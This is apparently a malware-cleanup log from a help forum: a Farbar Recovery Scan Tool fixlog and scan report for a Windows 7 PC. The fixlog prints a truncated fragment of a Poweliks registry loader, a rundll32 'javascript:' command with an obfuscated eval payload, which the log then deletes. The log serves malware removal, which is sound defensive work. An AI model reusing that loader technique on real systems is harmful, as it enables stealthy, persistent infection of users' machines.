HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll
C:\Users\JP\AppData\Local\Temp\Quarantine.exe
C:\Users\JP\AppData\Local\Temp\sqlite3.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll
EmptyTemp:
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32\\Default => Value was restored successfully.
HKLM\Software\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32\\Default => Value was restored successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}" => Key deleted successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
"HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => value deleted successfully.
"HKCR\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
"HKCR\PROTOCOLS\Handler\ipp\0x00000001" => Key deleted successfully.
"HKCR\CLSID\{E1D2BF42-A96B-11D1-9C6B-0000F875AC61}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec} => Moved successfully.
"C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@" => File/Directory not found.
C:\Users\JP\AppData\Local\Temp\cabex.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\JP\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\VARemove.exe => Moved successfully.
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe => Moved successfully.
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
EmptyTemp: => Removed 3.5 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====

 

--------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-10-2014
Ran by JP (administrator) on JIM-PC on 21-10-2014 21:09:44
Running from C:\Users\JP\Desktop
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgnsa.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Speedbit Ltd.) C:\Program Files (x86)\DAP\DAP.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Core Temp\Core Temp.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://duckduckgo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp - No CLSID Value -
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp - No CLSID Value -
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
S2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-20] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-21 21:08 - 2014-10-21 21:10 - 00018639 _____ () C:\Users\JP\Desktop\FRST.txt
2014-10-21 20:48 - 2014-10-21 20:48 - 00000000 ____D () C:\Users\JP\Desktop\FRST-OlderVersion
2014-10-21 20:45 - 2014-07-10 12:38 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\JP\Desktop\TDSSKiller.exe
2014-10-21 20:44 - 2014-10-21 20:48 - 02110976 _____ (Farbar) C:\Users\JP\Desktop\FRST64.exe
2014-10-21 20:44 - 2014-10-17 20:21 - 15725144 _____ () C:\Users\JP\Desktop\RogueKiller.exe
2014-10-20 18:16 - 2014-10-20 18:16 - 00002606 _____ () C:\Users\JP\Desktop\JRT.txt
2014-10-20 18:12 - 2014-10-20 18:12 - 00000000 ____D () C:\Windows\ERUNT
2014-10-20 17:38 - 2014-10-20 17:45 - 00000000 ____D () C:\AdwCleaner
2014-10-20 08:30 - 2014-10-21 21:09 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-21 21:05 - 00151022 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-20 17:15 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
